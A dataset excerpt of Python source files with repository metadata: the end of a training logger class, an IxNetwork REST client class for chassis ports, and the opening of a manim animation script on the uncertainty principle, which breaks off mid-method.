train_format = COMMON_TRAIN_FORMAT + AGENT_TRAIN_FORMAT[agent]
self._train_mg = MetersGroup(os.path.join(log_dir, 'train'),
formating=train_format)
self._eval_mg = MetersGroup(os.path.join(log_dir, 'eval'),
formating=COMMON_EVAL_FORMAT)
def _should_log(self, step, log_frequency):
log_frequency = log_frequency or self._log_frequency
return step % log_frequency == 0
def _update_step(self, step):
return step * self._action_repeat
def _try_sw_log(self, key, value, step):
step = self._update_step(step)
if self._sw is not None:
self._sw.add_scalar(key, value, step)
def _try_sw_log_image(self, key, image, step):
step = self._update_step(step)
if self._sw is not None:
assert image.dim() == 3
grid = torchvision.utils.make_grid(image.unsqueeze(1))
self._sw.add_image(key, grid, step)
def _try_sw_log_video(self, key, frames, step):
step = self._update_step(step)
if self._sw is not None:
frames = torch.from_numpy(np.array(frames))
frames = frames.unsqueeze(0)
self._sw.add_video(key, frames, step, fps=30)
def _try_sw_log_histogram(self, key, histogram, step):
step = self._update_step(step)
if self._sw is not None:
self._sw.add_histogram(key, histogram, step)
def log(self, key, value, step, n=1, log_frequency=1):
if not self._should_log(step, log_frequency):
return
assert key.startswith('train') or key.startswith('eval')
if type(value) == torch.Tensor:
value = value.item()
self._try_sw_log(key, value / n, step)
mg = self._train_mg if key.startswith('train') else self._eval_mg
mg.log(key, value, n)
def eval_log(self, key, value, step, n=1, log_frequency=1):
assert key.startswith('train') or key.startswith('eval')
if type(value) == torch.Tensor:
value = value.item()
self._try_sw_log(key, value / n, step)
mg = self._train_mg if key.startswith('train') else self._eval_mg
mg.log(key, value, n)
def log_param(self, key, param, step, log_frequency=None):
if not self._should_log(step, log_frequency):
return
self.log_histogram(key + '_w', param.weight.data, step)
if hasattr(param.weight, 'grad') and param.weight.grad is not None:
self.log_histogram(key + '_w_g', param.weight.grad.data, step)
if hasattr(param, 'bias') and hasattr(param.bias, 'data'):
self.log_histogram(key + '_b', param.bias.data, step)
if hasattr(param.bias, 'grad') and param.bias.grad is not None:
self.log_histogram(key + '_b_g', param.bias.grad.data, step)
def log_image(self, key, image, step, log_frequency=None):
if not self._should_log(step, log_frequency):
return
assert key.startswith('train') or key.startswith('eval')
self._try_sw_log_image(key, image, step)
def log_video(self, key, frames, step, log_frequency=None):
if not self._should_log(step, log_frequency):
return
assert key.startswith('train') or key.startswith('eval')
self._try_sw_log_video(key, frames, step)
def log_histogram(self, key, histogram, step, log_frequency=None):
if not self._should_log(step, log_frequency):
return
assert key.startswith('train') or key.startswith('eval')
self._try_sw_log_histogram(key, histogram, step)
def dump(self, step, save=True, ty=None):
step = self._update_step(step)
if ty is None:
self._train_mg.dump(step, 'train', save)
self._eval_mg.dump(step, 'eval', save)
elif ty == 'eval':
self._eval_mg.dump(step, 'eval', save)
elif ty == 'train':
self._train_mg.dump(step, 'train', save)
else:
raise f'invalid log type: {ty}'
| true
| true
|
f707a3492c750af198258b9f0c53a07e78fef229
| 7,298
|
py
|
Python
|
uhd_restpy/testplatform/sessions/ixnetwork/locations/ports/ports.py
|
Vibaswan/ixnetwork_restpy
|
239fedc7050890746cbabd71ea1e91c68d9e5cad
|
[
"MIT"
] | null | null | null |
uhd_restpy/testplatform/sessions/ixnetwork/locations/ports/ports.py
|
Vibaswan/ixnetwork_restpy
|
239fedc7050890746cbabd71ea1e91c68d9e5cad
|
[
"MIT"
] | null | null | null |
uhd_restpy/testplatform/sessions/ixnetwork/locations/ports/ports.py
|
Vibaswan/ixnetwork_restpy
|
239fedc7050890746cbabd71ea1e91c68d9e5cad
|
[
"MIT"
] | null | null | null |
# MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from uhd_restpy.base import Base
from uhd_restpy.files import Files
class Ports(Base):
"""
The Ports class encapsulates a list of ports resources that are managed by the system.
A list of resources can be retrieved from the server using the Ports.find() method.
"""
__slots__ = ()
_SDM_NAME = 'ports'
_SDM_ATT_MAP = {
'Description': 'description',
'IsAvailable': 'isAvailable',
'IsBusy': 'isBusy',
'IsLinkUp': 'isLinkUp',
'Location': 'location',
'Owner': 'owner',
'ResourceMode': 'resourceMode',
}
def __init__(self, parent):
super(Ports, self).__init__(parent)
@property
def Description(self):
"""
Returns
-------
- str:
"""
return self._get_attribute(self._SDM_ATT_MAP['Description'])
@property
def IsAvailable(self):
"""
Returns
-------
- bool:
"""
return self._get_attribute(self._SDM_ATT_MAP['IsAvailable'])
@property
def IsBusy(self):
"""
Returns
-------
- bool:
"""
return self._get_attribute(self._SDM_ATT_MAP['IsBusy'])
@property
def IsLinkUp(self):
"""
Returns
-------
- bool:
"""
return self._get_attribute(self._SDM_ATT_MAP['IsLinkUp'])
@property
def Location(self):
"""
Returns
-------
- str:
"""
return self._get_attribute(self._SDM_ATT_MAP['Location'])
@property
def Owner(self):
"""
Returns
-------
- str:
"""
return self._get_attribute(self._SDM_ATT_MAP['Owner'])
@property
def ResourceMode(self):
"""
Returns
-------
- str(normal | tenGig | fortyGig | singleMode | dualMode | hundredGigNonFanOut | fortyGigFanOut | threeByTenGigFanOut | eightByTenGigFanOut | fourByTwentyFiveGigNonFanOut | twoByTwentyFiveGigNonFanOut | oneByFiftyGigNonFanOut | fortyGigNonFanOut | oneByTenGigFanOut | fourByTenGigFanOut | incompatibleMode | hundredGigCapturePlayback | fortyGigCapturePlayback | novusHundredGigNonFanOut | novusFourByTwentyFiveGigNonFanOut | novusTwoByFiftyGigNonFanOut | novusOneByFortyGigNonFanOut | novusFourByTenGigNonFanOut | krakenOneByFourHundredGigNonFanOut | krakenOneByTwoHundredGigNonFanOut | krakenTwoByOneHundredGigFanOut | krakenFourByFiftyGigFanOut | aresOneOneByFourHundredGigNonFanOut | aresOneTwoByTwoHundredGigFanOut | aresOneFourByOneHundredGigFanOut | aresOneFourByOneHundredGigMacSecFanOut | aresOneEightByFiftyGigFanOut | uhdOneHundredEightByHundredGigNonFanOut | uhdOneHundredEightByFortyGigNonFanOut | uhdOneHundredSixteenByFiftyGigFanOut | uhdOneHundredThirtyTwoByTwentyFiveGigFanOut | uhdOneHundredThirtyTwoByTenGigFanOut | notApplicable):
"""
return self._get_attribute(self._SDM_ATT_MAP['ResourceMode'])
def find(self, Description=None, IsAvailable=None, IsBusy=None, IsLinkUp=None, Location=None, Owner=None, ResourceMode=None):
"""Finds and retrieves ports resources from the server.
All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve ports resources from the server.
To retrieve an exact match ensure the parameter value starts with ^ and ends with $
By default the find method takes no parameters and will retrieve all ports resources from the server.
Args
----
- Description (str):
- IsAvailable (bool):
- IsBusy (bool):
- IsLinkUp (bool):
- Location (str):
- Owner (str):
- ResourceMode (str(normal | tenGig | fortyGig | singleMode | dualMode | hundredGigNonFanOut | fortyGigFanOut | threeByTenGigFanOut | eightByTenGigFanOut | fourByTwentyFiveGigNonFanOut | twoByTwentyFiveGigNonFanOut | oneByFiftyGigNonFanOut | fortyGigNonFanOut | oneByTenGigFanOut | fourByTenGigFanOut | incompatibleMode | hundredGigCapturePlayback | fortyGigCapturePlayback | novusHundredGigNonFanOut | novusFourByTwentyFiveGigNonFanOut | novusTwoByFiftyGigNonFanOut | novusOneByFortyGigNonFanOut | novusFourByTenGigNonFanOut | krakenOneByFourHundredGigNonFanOut | krakenOneByTwoHundredGigNonFanOut | krakenTwoByOneHundredGigFanOut | krakenFourByFiftyGigFanOut | aresOneOneByFourHundredGigNonFanOut | aresOneTwoByTwoHundredGigFanOut | aresOneFourByOneHundredGigFanOut | aresOneFourByOneHundredGigMacSecFanOut | aresOneEightByFiftyGigFanOut | uhdOneHundredEightByHundredGigNonFanOut | uhdOneHundredEightByFortyGigNonFanOut | uhdOneHundredSixteenByFiftyGigFanOut | uhdOneHundredThirtyTwoByTwentyFiveGigFanOut | uhdOneHundredThirtyTwoByTenGigFanOut | notApplicable)):
Returns
-------
- self: This instance with matching ports resources retrieved from the server available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))
def read(self, href):
"""Retrieves a single instance of ports data from the server.
Args
----
- href (str): An href to the instance to be retrieved
Returns
-------
- self: This instance with the ports resources from the server available through an iterator or index
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
return self._read(href)
def ClearOwnership(self):
"""Executes the clearOwnership operation on the server.
Clears ownership on a list of location ports.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
return self._execute('clearOwnership', payload=payload, response_object=None)
| 43.700599
| 1,073
| 0.699644
|
from uhd_restpy.base import Base
from uhd_restpy.files import Files
class Ports(Base):
__slots__ = ()
_SDM_NAME = 'ports'
_SDM_ATT_MAP = {
'Description': 'description',
'IsAvailable': 'isAvailable',
'IsBusy': 'isBusy',
'IsLinkUp': 'isLinkUp',
'Location': 'location',
'Owner': 'owner',
'ResourceMode': 'resourceMode',
}
def __init__(self, parent):
super(Ports, self).__init__(parent)
@property
def Description(self):
return self._get_attribute(self._SDM_ATT_MAP['Description'])
@property
def IsAvailable(self):
return self._get_attribute(self._SDM_ATT_MAP['IsAvailable'])
@property
def IsBusy(self):
return self._get_attribute(self._SDM_ATT_MAP['IsBusy'])
@property
def IsLinkUp(self):
return self._get_attribute(self._SDM_ATT_MAP['IsLinkUp'])
@property
def Location(self):
return self._get_attribute(self._SDM_ATT_MAP['Location'])
@property
def Owner(self):
return self._get_attribute(self._SDM_ATT_MAP['Owner'])
@property
def ResourceMode(self):
return self._get_attribute(self._SDM_ATT_MAP['ResourceMode'])
def find(self, Description=None, IsAvailable=None, IsBusy=None, IsLinkUp=None, Location=None, Owner=None, ResourceMode=None):
return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))
def read(self, href):
return self._read(href)
def ClearOwnership(self):
payload = { "Arg1": self }
return self._execute('clearOwnership', payload=payload, response_object=None)
| true
| true
|
f707a3f06a7cb5465d7d05ec43434eb468d41d63
| 153,194
|
py
|
Python
|
from_3b1b/old/uncertainty.py
|
adornetejr/manim
|
e0715ceeff4778d11ef4ac31f8f8f2b56a2187ad
|
[
"MIT"
] | 48
|
2021-06-28T01:48:01.000Z
|
2022-03-31T18:22:32.000Z
|
from_3b1b/old/uncertainty.py
|
im-AMS/manim
|
19e3c97589181ffd43ef14d9169af4e40e054664
|
[
"MIT"
] | 5
|
2021-03-19T11:41:36.000Z
|
2022-03-12T00:20:16.000Z
|
from_3b1b/old/uncertainty.py
|
im-AMS/manim
|
19e3c97589181ffd43ef14d9169af4e40e054664
|
[
"MIT"
] | 15
|
2021-06-28T07:48:36.000Z
|
2022-03-23T03:05:11.000Z
|
# -*- coding: utf-8 -*-
import scipy
from manimlib.imports import *
from from_3b1b.old.fourier import *
import warnings
warnings.warn("""
Warning: This file makes use of
ContinualAnimation, which has since
been deprecated
""")
FREQUENCY_COLOR = RED
USE_ALMOST_FOURIER_BY_DEFAULT = False
class GaussianDistributionWrapper(Line):
"""
This is meant to encode a 2d normal distribution as
a mobject (so as to be able to have it be interpolated
during animations). It is a line whose center is the mean
mu of a distribution, and whose radial vector (center to end)
is the distribution's standard deviation
"""
CONFIG = {
"stroke_width" : 0,
"mu" : ORIGIN,
"sigma" : RIGHT,
}
def __init__(self, **kwargs):
Line.__init__(self, ORIGIN, RIGHT, **kwargs)
self.change_parameters(self.mu, self.sigma)
def change_parameters(self, mu = None, sigma = None):
curr_mu, curr_sigma = self.get_parameters()
mu = mu if mu is not None else curr_mu
sigma = sigma if sigma is not None else curr_sigma
self.put_start_and_end_on(mu - sigma, mu + sigma)
return self
def get_parameters(self):
""" Return mu_x, mu_y, sigma_x, sigma_y"""
center, end = self.get_center(), self.get_end()
return center, end-center
def get_random_points(self, size = 1):
mu, sigma = self.get_parameters()
return np.array([
np.array([
np.random.normal(mu_coord, sigma_coord)
for mu_coord, sigma_coord in zip(mu, sigma)
])
for x in range(size)
])
class ProbabalisticMobjectCloud(ContinualAnimation):
CONFIG = {
"fill_opacity" : 0.25,
"n_copies" : 100,
"gaussian_distribution_wrapper_config" : {},
"time_per_change" : 1./60,
"start_up_time" : 0,
}
def __init__(self, prototype, **kwargs):
digest_config(self, kwargs)
fill_opacity = self.fill_opacity or prototype.get_fill_opacity()
if "mu" not in self.gaussian_distribution_wrapper_config:
self.gaussian_distribution_wrapper_config["mu"] = prototype.get_center()
self.gaussian_distribution_wrapper = GaussianDistributionWrapper(
**self.gaussian_distribution_wrapper_config
)
self.time_since_last_change = np.inf
group = VGroup(*[
prototype.copy().set_fill(opacity = fill_opacity)
for x in range(self.n_copies)
])
ContinualAnimation.__init__(self, group, **kwargs)
self.update_mobject(0)
def update_mobject(self, dt):
self.time_since_last_change += dt
if self.time_since_last_change < self.time_per_change:
return
self.time_since_last_change = 0
group = self.mobject
points = self.gaussian_distribution_wrapper.get_random_points(len(group))
for mob, point in zip(group, points):
self.update_mobject_by_point(mob, point)
return self
def update_mobject_by_point(self, mobject, point):
mobject.move_to(point)
return self
class ProbabalisticDotCloud(ProbabalisticMobjectCloud):
CONFIG = {
"color" : BLUE,
}
def __init__(self, **kwargs):
digest_config(self, kwargs)
dot = Dot(color = self.color)
ProbabalisticMobjectCloud.__init__(self, dot)
class ProbabalisticVectorCloud(ProbabalisticMobjectCloud):
CONFIG = {
"color" : RED,
"n_copies" : 20,
"fill_opacity" : 0.5,
"center_func" : lambda : ORIGIN,
}
def __init__(self, **kwargs):
digest_config(self, kwargs)
vector = Vector(
RIGHT, color = self.color,
max_tip_length_to_length_ratio = 1,
)
ProbabalisticMobjectCloud.__init__(self, vector)
def update_mobject_by_point(self, vector, point):
vector.put_start_and_end_on(
self.center_func(),
point
)
class RadarDish(SVGMobject):
CONFIG = {
"file_name" : "radar_dish",
"fill_color" : LIGHT_GREY,
"stroke_color" : WHITE,
"stroke_width" : 1,
"height" : 1,
}
class Plane(SVGMobject):
CONFIG = {
"file_name" : "plane",
"color" : LIGHT_GREY,
"height" : 1,
}
def __init__(self, **kwargs):
SVGMobject.__init__(self, **kwargs)
self.rotate(-TAU/4)
class FalconHeavy(SVGMobject):
CONFIG = {
"file_name" : "falcon_heavy",
"color" : WHITE,
"logo_color" : BLUE_E,
"height" : 1.5,
}
def __init__(self, **kwargs):
SVGMobject.__init__(self, **kwargs)
self.logo = self[-9:]
self.logo.set_color(self.logo_color)
class RadarPulseSingleton(ContinualAnimation):
CONFIG = {
"speed" : 3.0,
"direction" : RIGHT,
"start_up_time" : 0,
"fade_in_time" : 0.5,
"color" : WHITE,
"stroke_width" : 3,
}
def __init__(self, radar_dish, target, **kwargs):
digest_config(self, kwargs)
self.direction = self.direction/get_norm(self.direction)
self.radar_dish = radar_dish
self.target = target
self.reflection_distance = None
self.arc = Arc(
start_angle = -30*DEGREES,
angle = 60*DEGREES,
)
self.arc.set_height(0.75*radar_dish.get_height())
self.arc.move_to(radar_dish, UP+RIGHT)
self.start_points = np.array(self.arc.points)
self.start_center = self.arc.get_center()
self.finished = False
ContinualAnimation.__init__(self, self.arc, **kwargs)
def update_mobject(self, dt):
arc = self.arc
total_distance = self.speed*self.internal_time
arc.points = np.array(self.start_points)
arc.shift(total_distance*self.direction)
if self.internal_time < self.fade_in_time:
alpha = np.clip(self.internal_time/self.fade_in_time, 0, 1)
arc.set_stroke(self.color, alpha*self.stroke_width)
if self.reflection_distance is None:
#Check if reflection is happening
arc_point = arc.get_edge_center(self.direction)
target_point = self.target.get_edge_center(-self.direction)
arc_distance = np.dot(arc_point, self.direction)
target_distance = np.dot(target_point, self.direction)
if arc_distance > target_distance:
self.reflection_distance = target_distance
#Don't use elif in case the above code creates reflection_distance
if self.reflection_distance is not None:
delta_distance = total_distance - self.reflection_distance
point_distances = np.dot(self.direction, arc.points.T)
diffs = point_distances - self.reflection_distance
shift_vals = np.outer(-2*np.maximum(diffs, 0), self.direction)
arc.points += shift_vals
#Check if done
arc_point = arc.get_edge_center(-self.direction)
if np.dot(arc_point, self.direction) < np.dot(self.start_center, self.direction):
self.finished = True
self.arc.fade(1)
def is_finished(self):
return self.finished
class RadarPulse(ContinualAnimation):
CONFIG = {
"n_pulse_singletons" : 8,
"frequency" : 0.05,
"colors" : [BLUE, YELLOW]
}
def __init__(self, *args, **kwargs):
digest_config(self, kwargs)
colors = color_gradient(self.colors, self.n_pulse_singletons)
self.pulse_singletons = [
RadarPulseSingleton(*args, color = color, **kwargs)
for color in colors
]
pluse_mobjects = VGroup(*[ps.mobject for ps in self.pulse_singletons])
ContinualAnimation.__init__(self, pluse_mobjects, **kwargs)
def update_mobject(self, dt):
for i, ps in enumerate(self.pulse_singletons):
ps.internal_time = self.internal_time - i*self.frequency
ps.update_mobject(dt)
def is_finished(self):
return all([ps.is_finished() for ps in self.pulse_singletons])
class MultipleFlashes(Succession):
CONFIG = {
"run_time_per_flash" : 1.0,
"num_flashes" : 3,
}
def __init__(self, *args, **kwargs):
digest_config(self, kwargs)
kwargs["run_time"] = self.run_time_per_flash
Succession.__init__(self, *[
Flash(*args, **kwargs)
for x in range(self.num_flashes)
])
class TrafficLight(SVGMobject):
CONFIG = {
"file_name" : "traffic_light",
"height" : 0.7,
"post_height" : 2,
"post_width" : 0.05,
}
def __init__(self, **kwargs):
SVGMobject.__init__(self, **kwargs)
post = Rectangle(
height = self.post_height,
width = self.post_width,
stroke_width = 0,
fill_color = WHITE,
fill_opacity = 1,
)
self.move_to(post.get_top(), DOWN)
self.add_to_back(post)
###################
class MentionUncertaintyPrinciple(TeacherStudentsScene):
def construct(self):
title = TextMobject("Heisenberg Uncertainty Principle")
title.to_edge(UP)
dot_cloud = ProbabalisticDotCloud()
vector_cloud = ProbabalisticVectorCloud(
gaussian_distribution_wrapper_config = {"sigma_x" : 0.2},
center_func = lambda : dot_cloud.gaussian_distribution_wrapper.get_parameters()[0],
)
for cloud in dot_cloud, vector_cloud:
cloud.gaussian_distribution_wrapper.next_to(
title, DOWN, 2*LARGE_BUFF
)
vector_cloud.gaussian_distribution_wrapper.shift(3*RIGHT)
def get_brace_text_group_update(gdw, vect, text, color):
brace = Brace(gdw, vect)
text = brace.get_tex("2\\sigma_{\\text{%s}}"%text, buff = SMALL_BUFF)
group = VGroup(brace, text)
def update_group(group):
brace, text = group
brace.match_width(gdw, stretch = True)
brace.next_to(gdw, vect)
text.next_to(brace, vect, buff = SMALL_BUFF)
group.set_color(color)
return Mobject.add_updater(group, update_group)
dot_brace_anim = get_brace_text_group_update(
dot_cloud.gaussian_distribution_wrapper,
DOWN, "position", dot_cloud.color
)
vector_brace_anim = get_brace_text_group_update(
vector_cloud.gaussian_distribution_wrapper,
UP, "momentum", vector_cloud.color
)
self.add(title)
self.add(dot_cloud)
self.play(
Write(title),
self.teacher.change, "raise_right_hand",
self.get_student_changes(*["pondering"]*3)
)
self.play(
Write(dot_brace_anim.mobject, run_time = 1)
)
self.add(dot_brace_anim)
self.wait()
# self.wait(2)
self.play(
dot_cloud.gaussian_distribution_wrapper.change_parameters,
{"sigma" : 0.1*RIGHT},
run_time = 2,
)
self.wait()
self.add(vector_cloud)
self.play(
FadeIn(vector_brace_anim.mobject)
)
self.add(vector_brace_anim)
self.play(
vector_cloud.gaussian_distribution_wrapper.change_parameters,
{"sigma" : RIGHT},
self.get_student_changes(*3*["confused"]),
run_time = 3,
)
#Back and forth
for x in range(2):
self.play(
dot_cloud.gaussian_distribution_wrapper.change_parameters,
{"sigma" : 2*RIGHT},
vector_cloud.gaussian_distribution_wrapper.change_parameters,
{"sigma" : 0.1*RIGHT},
run_time = 3,
)
self.change_student_modes("thinking", "erm", "sassy")
self.play(
dot_cloud.gaussian_distribution_wrapper.change_parameters,
{"sigma" : 0.1*RIGHT},
vector_cloud.gaussian_distribution_wrapper.change_parameters,
{"sigma" : 1*RIGHT},
run_time = 3,
)
self.wait()
class FourierTradeoff(Scene):
CONFIG = {
"show_text" : True,
"complex_to_real_func" : lambda z : z.real,
"widths" : [6, 0.02, 1],
}
def construct(self):
#Setup axes
time_mean = 4
time_axes = Axes(
x_min = 0,
x_max = 2*time_mean,
x_axis_config = {"unit_size" : 1.5},
y_min = -2,
y_max = 2,
y_axis_config = {"unit_size" : 0.5}
)
time_label = TextMobject("Time")
time_label.scale(1.5)
time_label.next_to(
time_axes.x_axis.get_right(), UP+LEFT,
buff = MED_SMALL_BUFF,
)
time_axes.add(time_label)
time_axes.center().to_edge(UP)
time_axes.x_axis.add_numbers(*list(range(1, 2*time_mean)))
frequency_axes = Axes(
x_min = 0,
x_max = 8,
x_axis_config = {"unit_size" : 1.5},
y_min = -0.025,
y_max = 0.075,
y_axis_config = {
"unit_size" : 30,
"tick_frequency" : 0.025,
},
color = TEAL,
)
frequency_label = TextMobject("Frequency")
frequency_label.scale(1.5)
frequency_label.next_to(
frequency_axes.x_axis.get_right(), UP+LEFT,
buff = MED_SMALL_BUFF,
)
frequency_label.set_color(FREQUENCY_COLOR)
frequency_axes.add(frequency_label)
frequency_axes.move_to(time_axes, LEFT)
frequency_axes.to_edge(DOWN, buff = LARGE_BUFF)
frequency_axes.x_axis.add_numbers()
# Graph information
#x-coordinate of this point determines width of wave_packet graph
width_tracker = ExponentialValueTracker(0.5)
get_width = width_tracker.get_value
def get_wave_packet_function():
factor = 1./get_width()
return lambda t : (factor**0.25)*np.cos(4*TAU*t)*np.exp(-factor*(t-time_mean)**2)
def get_wave_packet():
graph = time_axes.get_graph(
get_wave_packet_function(),
num_graph_points = 200,
)
graph.set_color(YELLOW)
return graph
time_radius = 10
def get_wave_packet_fourier_transform():
return get_fourier_graph(
frequency_axes,
get_wave_packet_function(),
t_min = time_mean - time_radius,
t_max = time_mean + time_radius,
n_samples = 2*time_radius*17,
complex_to_real_func = self.complex_to_real_func,
color = FREQUENCY_COLOR,
)
wave_packet = get_wave_packet()
wave_packet_update = UpdateFromFunc(
wave_packet,
lambda g : Transform(g, get_wave_packet()).update(1)
)
fourier_graph = get_wave_packet_fourier_transform()
fourier_graph_update = UpdateFromFunc(
fourier_graph,
lambda g : Transform(g, get_wave_packet_fourier_transform()).update(1)
)
arrow = Arrow(
wave_packet, frequency_axes.coords_to_point(
4, frequency_axes.y_max/2,
),
color = FREQUENCY_COLOR,
)
fourier_words = TextMobject("Fourier Transform")
fourier_words.next_to(arrow, LEFT, buff = MED_LARGE_BUFF)
sub_words = TextMobject("(To be explained shortly)")
sub_words.set_color(BLUE)
sub_words.scale(0.75)
sub_words.next_to(fourier_words, DOWN)
#Draw items
self.add(time_axes, frequency_axes)
self.play(ShowCreation(wave_packet, rate_func = double_smooth))
anims = [ReplacementTransform(
wave_packet.copy(), fourier_graph
)]
if self.show_text:
anims += [
GrowArrow(arrow),
Write(fourier_words, run_time = 1)
]
self.play(*anims)
# self.play(FadeOut(arrow))
self.wait()
for width in self.widths:
self.play(
width_tracker.set_value, width,
wave_packet_update,
fourier_graph_update,
run_time = 3
)
if sub_words not in self.mobjects and self.show_text:
self.play(FadeIn(sub_words))
else:
self.wait()
self.wait()
class ShowPlan(PiCreatureScene):
def construct(self):
self.add_title()
words = self.get_words()
self.play_sound_anims(words[0])
self.play_doppler_anims(words[1])
self.play_quantum_anims(words[2])
def add_title(self):
title = TextMobject("The plan")
title.scale(1.5)
title.to_edge(UP)
h_line = Line(LEFT, RIGHT).scale(FRAME_X_RADIUS)
h_line.next_to(title, DOWN)
self.add(title, h_line)
def get_words(self):
trips = [
("sound waves", "(time vs. frequency)", YELLOW),
("Doppler radar", "(distance vs. velocity)", GREEN),
("quantum particles", "(position vs. momentum)", BLUE),
]
words = VGroup()
for topic, tradeoff, color in trips:
word = TextMobject("Uncertainty for", topic, tradeoff)
word[1:].set_color(color)
word[2].scale(0.75)
word[2].next_to(word[1], DOWN, buff = 1.5*SMALL_BUFF)
words.add(word)
words.arrange(DOWN, aligned_edge = LEFT, buff = MED_LARGE_BUFF)
words.to_edge(LEFT)
return words
def play_sound_anims(self, word):
morty = self.pi_creature
wave = FunctionGraph(
lambda x : 0.3*np.sin(15*x)*np.sin(0.5*x),
x_min = 0, x_max = 30,
step_size = 0.001,
)
wave.next_to(word, RIGHT)
rect = BackgroundRectangle(wave, fill_opacity = 1)
rect.stretch(2, 1)
rect.next_to(wave, LEFT, buff = 0)
always_shift(wave, direction=LEFT, rate=5)
wave_fader = UpdateFromAlphaFunc(
wave,
lambda w, a : w.set_stroke(width = 3*a)
)
checkmark = self.get_checkmark(word)
self.add(wave)
self.add_foreground_mobjects(rect, word)
self.play(
Animation(word),
wave_fader,
morty.change, "raise_right_hand", word
)
self.wait(2)
wave_fader.rate_func = lambda a : 1-smooth(a)
self.add_foreground_mobjects(checkmark)
self.play(
Write(checkmark),
morty.change, "happy",
wave_fader,
)
self.remove_foreground_mobjects(rect, word)
self.add(word)
self.wait()
def play_doppler_anims(self, word):
morty = self.pi_creature
radar_dish = RadarDish()
radar_dish.next_to(word, DOWN, aligned_edge = LEFT)
target = Plane()
# target.match_height(radar_dish)
target.next_to(radar_dish, RIGHT, buff = LARGE_BUFF)
always_shift(target, direction = RIGHT, rate = 1.25)
pulse = RadarPulse(radar_dish, target)
checkmark = self.get_checkmark(word)
self.add(target)
self.play(
Write(word),
DrawBorderThenFill(radar_dish),
UpdateFromAlphaFunc(
target, lambda m, a : m.set_fill(opacity = a)
),
morty.change, "pondering",
run_time = 1
)
self.add(pulse)
count = it.count() #TODO, this is not a great hack...
while not pulse.is_finished() and next(count) < 15:
self.play(
morty.look_at, pulse.mobject,
run_time = 0.5
)
self.play(
Write(checkmark),
UpdateFromAlphaFunc(
target, lambda m, a : m.set_fill(opacity = 1-a)
),
FadeOut(radar_dish),
morty.change, "happy"
)
self.wait()
def play_quantum_anims(self, word):
morty = self.pi_creature
dot_cloud = ProbabalisticDotCloud()
gdw = dot_cloud.gaussian_distribution_wrapper
gdw.next_to(word, DOWN, MED_LARGE_BUFF)
gdw.rotate(5*DEGREES)
gdw.save_state()
gdw.scale(0)
checkmark = self.get_checkmark(word)
ish = TextMobject("$\\dots$ish")
ish.next_to(checkmark, RIGHT, -SMALL_BUFF, DOWN)
self.add(dot_cloud)
self.play(
Write(word),
FadeIn(dot_cloud.mobject),
morty.change, "confused",
)
self.play(gdw.restore, run_time = 2)
self.play(Write(checkmark))
self.wait()
self.play(
Write(ish),
morty.change, 'maybe'
)
self.wait(6)
##
def get_checkmark(self, word):
checkmark = TexMobject("\\checkmark")
checkmark.set_color(GREEN)
checkmark.scale(1.25)
checkmark.next_to(word[1], UP+RIGHT, buff = 0)
return checkmark
class StartWithIntuition(TeacherStudentsScene):
def construct(self):
self.teacher_says(
"You already \\\\ have this \\\\ intuition",
bubble_kwargs = {
"height" : 3.5,
"width" : 3,
},
)
self.change_student_modes("pondering", "erm", "maybe")
self.look_at(VectorizedPoint(4*LEFT + 2*UP))
self.wait(5)
class TwoCarsAtRedLight(Scene):
CONFIG = {
"text_scale_val" : 0.75,
}
def construct(self):
self.pull_up_behind()
self.flash_in_sync_short_time()
self.show_low_confidence()
self.flash_in_sync_long_time()
self.show_high_confidence()
def pull_up_behind(self):
#Setup Traffic light
traffic_light = TrafficLight()
traffic_light.move_to(6*RIGHT + 2.5*DOWN, DOWN)
source_point = VectorizedPoint(
traffic_light[2].get_right()
)
screen = Line(ORIGIN, UP)
screen.next_to(source_point, RIGHT, LARGE_BUFF)
red_light = Spotlight(
color = RED,
source_point = source_point,
radius = 0.5,
screen = screen,
num_levels = 20,
opacity_function = lambda r : 1/(10*r**2+1)
)
red_light.fade(0.5)
red_light.rotate(TAU/2, about_edge = LEFT)
self.add(red_light, traffic_light)
#Setup cars
car1, car2 = cars = self.cars = VGroup(*[
Car() for x in range(2)
])
cars.arrange(RIGHT, buff = LARGE_BUFF)
cars.next_to(
traffic_light, LEFT,
buff = LARGE_BUFF, aligned_edge = DOWN
)
car2.pi_creature.set_color(GREY_BROWN)
car1.start_point = car1.get_corner(DOWN+RIGHT)
car1.shift(FRAME_X_RADIUS*LEFT)
#Pull up car
self.add(cars)
self.play(
SwitchOn(
red_light,
rate_func = squish_rate_func(smooth, 0, 0.3),
),
Animation(traffic_light),
self.get_flashes(car2, num_flashes = 3),
MoveCar(
car1, car1.start_point,
run_time = 3,
rate_func = rush_from,
)
)
def flash_in_sync_short_time(self):
car1, car2 = cars = self.cars
#Setup axes
axes = Axes(
x_min = 0,
x_max = 5,
y_min = 0,
y_max = 2,
y_axis_config = {
"tick_frequency" : 0.5,
},
)
axes.x_axis.add_numbers(1, 2, 3)
time_label = TextMobject("Time")
time_label.scale(self.text_scale_val)
time_label.next_to(axes.x_axis.get_right(), DOWN)
y_title = TextMobject("Signal")
y_title.scale(self.text_scale_val)
